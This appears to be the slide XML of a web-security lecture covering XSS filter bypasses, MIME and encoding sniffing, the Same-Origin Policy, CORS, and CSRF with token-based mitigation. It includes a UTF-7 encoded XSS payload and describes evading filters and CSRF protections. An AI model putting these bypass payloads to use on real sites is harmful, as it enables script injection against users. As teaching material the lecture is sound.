          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="93" name="Shape 93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="3993" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="95525" y="2396175"/>
            <a:ext cx="8961649" cy="1082000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Shape 94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457300" y="3915346"/>
            <a:ext cx="8229600" cy="114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2000"/>
              <a:t>A bad XSS filter on the web application may not see that as a script tag due to it being a ‘script/xss’ tag.  But Firefox’s HTML parser, for instance, will treat the slash as whitespace, enabling the attack!</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Legacy Parsing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Shape 10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700"/>
              <a:t>Due to decades of bad HTML, browsers are quite excellent at cleaning up after authors, and these conditions are often exploitable.</a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>&lt;script&gt; tag on its own will automatically be closed at the end of the page</a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>A tag missing its closing angle bracket will automatically be closed by the angle bracket of the next tag on the page</a:t>
            </a:r>
            <a:endParaRPr sz="2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Content Sniffing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MIME Sniffing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Shape 11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700"/>
              <a:t>The browser will often not just look at the Content-Type header that the server is passing, but also the contents of the page.  If it looks enough like HTML, it’ll be parsed as HTML.</a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>This led to IE 6/7-era bugs where image and text files containing HTML tags would execute as HTML.</a:t>
            </a:r>
            <a:endParaRPr sz="2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MIME Sniffing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Shape 11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700"/>
              <a:t>Imagine a site with a file upload function for profile pictures.</a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>If that file contains enough HTML to trigger the sniffing heuristics, an attacker could upload a picture and then link it to victims.</a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>This is one of the reasons why Facebook and other sites use a separate domain to host such content.</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Encoding Sniffing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Shape 12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700"/>
              <a:t>Similarly, the encoding used on a document will be sniffed by (mainly older) browsers.</a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>If you don’t specify an encoding for an HTML document, the browser will apply heuristics to determine it.</a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>If you are able to control the way the browser decodes text, you may be able to alter the parsing.</a:t>
            </a:r>
            <a:endParaRPr sz="2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Encoding Sniffing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Shape 12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A good example is putting UTF-7 (7-bit Unicode with Base-64’d blocks denoted by +..-) text into XSS payloads.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Consider the payload: +ADw-script+AD4-alert(1);+ADw-/script+AD4-</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>This will go cleanly through HTML encoding, as there are no ‘unsafe’ characters.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>IE8 and below, along with a host of other older browsers, will see this in a page as UTF-7 and switch the parsing over, enabling the attack to succeed.</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Same-Origin Policy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SOP?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Shape 140"/>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Same-Origin Policy (SOP) is how the browser restricts a number of security-critical features:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What domains you can contact via XMLHttpRequest</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Access to the DOM across separate frames/windows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Shape 38"/>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HTTP Crash Course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Origin Matching</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Shape 146"/>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The way origin matching for SOP works is much more strict than cookies:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Protocol must match -- no crossing HTTP/HTTPS boundaries</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Port numbers must match</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Domain names must be an exact match -- no wildcarding or subdomain walking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SOP Loosening</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Shape 15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700"/>
              <a:t>It’s possible for developers to loosen the grip that SOP has on their communications, by changing document.domain, posting messages between windows, and by using CORS (cross-origin resource sharing).</a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>All of these open up interesting avenues for attack.  Anyone can call postMessage into an IFrame -- how many pages validate messages properly?</a:t>
            </a:r>
            <a:endParaRPr sz="2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CORS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Shape 15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CORS is still very new, but enables some very risky situations.  In essence, you’re allowed to make XMLHttpRequests to domains outside of your origin, but they have special headers to signify where the request originates, what custom headers are added, etc.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>It’s possible to even have it pass the receiving domain’s cookies, allowing attackers to potentially compromise logged-in users.  The security prospects here are still largely unexplored.</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Cross-Site Request Forgery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What is CSRF?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Shape 16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Cross-Site Request Forgery is when an attacker tricks a victim into going to a page controlled by the attacker, which then submits data to the target site </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the victim.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>It is one of the most common vulnerabilities today, and enables a whole host of others, namely rXSS.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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Shape 175"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1460497"/>
            <a:ext cx="8229600" cy="15054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sz="2800"/>
              <a:t>The canonical example is a bank transfer site.  Here we have a form that allows a user to transfer money from their account to a destination account.</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="176" name="Shape 176"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="834100" y="3118297"/>
            <a:ext cx="7475800" cy="18728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Unknown Origin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Shape 18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200"/>
              <a:t>When the server gets such a transfer request from the client, how can it tell that it actually came from the real site?  Referer headers are unreliable at best.</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>Here we can see an automatic exploit that will transfer money if the user is logged in.</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="183" name="Shape 183"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3421947"/>
            <a:ext cx="9144000" cy="172155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189" name="Shape 18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Clearly, we need a way for the server to know for sure that the request has originated on its own page.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The best way to mitigate this bug is through the use of CSRF tokens.  These are random tokens tied to a user’s session, which you embed in each form that you generate.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195" name="Shape 195"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1460497"/>
            <a:ext cx="8229600" cy="1102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Here you can see a form containing a safe, random CSRF token.  In this case, it’s 32 nibbles of hex -- plenty of randomness to prevent guessing it.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="196" name="Shape 196"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3572647"/>
            <a:ext cx="8839199" cy="149316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Mitigation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Shape 202"/>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When the server gets a POST request, it should check to see that the CSRF token is present and matches the token associated with the user’s session.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Note that this will not help you with GET requests typically, but applications </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>should not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> be changing state with GET requests anyway.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Requests</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Shape 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1460498"/>
            <a:ext cx="8229600" cy="991500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Everyone here has probably seen an HTTP request:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Shape 45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2836273"/>
            <a:ext cx="8839200" cy="14787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How not to mitigate</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Shape 20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I’ve seen a number of sites implement “dynamic CSRF-proof forms”.  They had a csrf.js file that sends back code roughly equivalent to: $csrf = ‘session CSRF token’;</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>On each page, they had &lt;script src=”/csrf.js”&gt; and then baked the CSRF token into the forms from there.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>So all I had to do was include that same tag in my own exploit!</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Wrap Up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93700" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600"/>
              <a:t>Cookie domain scoping is often a source of trouble</a:t>
            </a:r>
            <a:endParaRPr sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600"/>
              <a:t>Same-Origin Policy is strict, but complex enough to be a frequent source of headaches for defenders and attackers alike</a:t>
            </a:r>
            <a:endParaRPr sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600"/>
              <a:t>Cross-Site Request Forgery is when an attacker tricks a victim into going to a page that triggers requests on other sites</a:t>
            </a:r>
            <a:endParaRPr sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600"/>
              <a:t>Use CSRF tokens!</a:t>
            </a:r>
            <a:endParaRPr sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Shape 219"/>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Requests</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Shape 51"/>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Basic format is as follows:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>VERB /resource/locator HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Header1: Value1</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Header2: Value2</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>&lt;Body of request&gt;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Request Headers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Shape 57"/>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74650" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>Host: Indicates the desired host handling the request</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>Accept: Indicates what MIME type(s) are accepted by the client; often used to specify JSON or XML output for web-services</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>Cookie: Passes cookie data to the server</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>Referer: Page leading to this request (note: this is not passed to other servers when using HTTPS on the origin)</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
